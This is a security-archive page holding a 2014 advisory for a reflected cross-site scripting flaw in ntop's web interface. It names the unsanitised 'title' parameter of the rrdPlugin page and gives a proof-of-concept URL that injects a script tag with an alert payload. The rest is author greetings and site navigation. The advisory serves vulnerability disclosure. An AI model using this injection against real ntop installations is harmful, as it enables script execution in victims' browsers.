ntop Cross Site Scripting

ntop Cross Site Scripting: Posted Jun 11, 2014; Authored by Manish Tanwar; ntop suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 35b20d152d65e04c2c54cd3dc5116e2a46f202ebdc20bb9c7b03b74554c6c04c; Download | Favorite | View

ntop Cross Site Scripting

############################################################################### 
# Exploit Title   : ntop, Web-based Traffic Analysis and Flow Collection tool reflected xss vulnerability
# Author          : Manish Kishan Tanwar  
# Vendor          : httphttp://www.ntop.org
# Date            : 10/06/2014 
#Discovered @     : INDISHELL Lab
# Love to         : zero cool,Team indishell,Hardeep Singh
#email            : manish.1046@gmail.com
############################################################################## 
////////////////////////
/// Overview: 
//////////////////////// 
ntop is Web-based Traffic Analysis and Flow Collection tool which is use to monitor network traffic.
its web interface suffers from xss vulnerability. 

///////////////////////////////
// Vulnerability Description: 
///////////////////////////////
title paramter in link 
http://localhost:3000/plugins/rrdPlugin?action=list&key=interfaces/eth0&title=interface eth0
doesnt check for values before displaying them on web page because of which it is vulnerable to xss

//////////////////////////////
///  Proof of Concept: -
//////////////////////////////
here is the example url injected with simple xss payload
http://localhost:3000/plugins/rrdPlugin?action=list&key=interfaces/eth0&title=interface eth0</title><script>alert('vulnerable to 


                             --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 
#Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,
#Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas 
#Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,
#The creator,cyber warrior,Neo hacker ICA,Suriya Prakash, cyber gladiator,Cyber Ace, 
#Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji ,
#Hacking queen,lovetherisk,brown suger and rest of TEAM INDISHELL
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)
                       --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

ntop Cross Site Scripting

ntop Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ntop Cross Site Scripting

Share This

ntop Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems